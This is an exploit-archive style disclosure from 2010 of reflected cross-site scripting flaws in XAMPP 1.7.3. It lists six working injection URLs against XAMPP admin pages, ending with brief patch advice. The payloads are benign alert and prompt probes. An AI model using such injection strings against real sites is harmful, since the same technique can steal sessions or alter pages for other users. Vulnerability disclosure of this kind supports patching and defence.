#**********************************************************
# Exploit Title: Xampp 1.7.3 multiple vulnerabilities
# Date: 11/06/2010
# Author: Sangteamtham
# Software Link: http://www.apachefriends.org/en/xampp.html
# Version: 1.7.3
# Tested on: Windows 7
# Email: Sangteamtham@gmail.com
# Blog: http://sangte.blogspot.com/
# Homepage: http://hcegroup.net/hceteam
#***********************************************************

1.Description:

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.

2. Vulnerabilities:

http://localhost/xampp/ming.php/"<script>alert("XSS")</script>
http://localhost/xampp/iart.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/cds.php/'onmouseover=alert("XSS")>
http://localhost/xampp/aspinfo.asp/1<script>alert("XSS")</script>
http://localhost/xampp/adodb.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/perlinfo.pl/1<script>prompt("XSS")</script>
3. Poc:



4. Patch:

Vender should filter the special characters when input the form.
Clients should set password access to xampp folder.

5. Credits:
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************